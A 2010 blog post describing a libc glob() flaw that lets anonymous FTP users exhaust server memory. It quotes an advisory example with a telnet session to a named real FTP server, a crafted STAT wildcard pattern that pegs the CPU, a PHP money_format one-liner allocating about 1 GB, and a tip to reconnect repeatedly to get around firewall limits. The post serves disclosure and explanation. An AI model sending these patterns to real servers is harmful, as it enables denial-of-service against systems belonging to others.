Friday, October 8, 2010

libc Implementation Bug.

A flaw in the implementation of the glob() function in various C libraries (libc) can be exploited to remotely cripple FTP servers. As many FTP servers allow anonymous log-ins, and the flaw is said to be easy to exploit, many servers are at risk of falling victim to the attack. A report by security specialist Maksymilian Arciemowicz says that even large FTP servers such as those run by Adobe and HP are affected. The problem exists because GLOB_LIMIT, a feature added in 2001 to limit the amount of memory used by the glob() function is ineffective. Globbing, as it is called, calls on the glob() function to match wildcard patterns when generating a list of matching file names. Because GLOB_LIMIT is not effective, it potentially allows a system's main memory to be flooded when processing certain patterns and this may, depending on the hardware used, cause the system to become very slow, cease to respond or even crash as a result.

From SecurityReasons we get the fully documented explanation.

But lets see an example:

Example:
> telnet ftp.netbsd.org 21
Trying 204.152.190.15...
Connected to ftp.netbsd.org.
Escape character is '^]'.
220 ftp.NetBSD.org FTP server (NetBSD-ftpd 20100320) ready.
user anonymous
331 Guest login ok, type your name as password.
pass anon@cxib
230-
The NetBSD Project FTP Server located in Redwood City, CA, USA
...
230-
EXPORT NOTICE

...
230 Guest login ok, access restrictions apply.
stat
{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}
/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*cx


this request will generate 100% usage of process a long time. ftpd come
into glob(3) and will not fast out. Very similar sympthon was described in
vulnerability for glibc strfmon(3)

- - http://securityreason.com/achievement_securityalert/67 --
...
Interesting is that the PHP memory_limit has no control over what will
happens in the level of the libc. Function strfmon(3) can allocate a lot
of
data in memory without control by PHP memory_limit.

For example:
php -r 'money_format("%.1343741821i",1);'

will allocate ~1049MB real memory.
memory_limit can be less that 1049M
...
- - http://securityreason.com/achievement_securityalert/67 --

ftpd also dosen't control what will happen in libc.

so it is enough to send
- ---
USER anonymous
PASS
STAT */..[calculated pattern]
- ---

and disconnect to connect again (bypass firewall limits). In php we can
also bypass max_memory_limit by libc vulns.

Attacking machine in this way, we can call the various side effects.

No comments: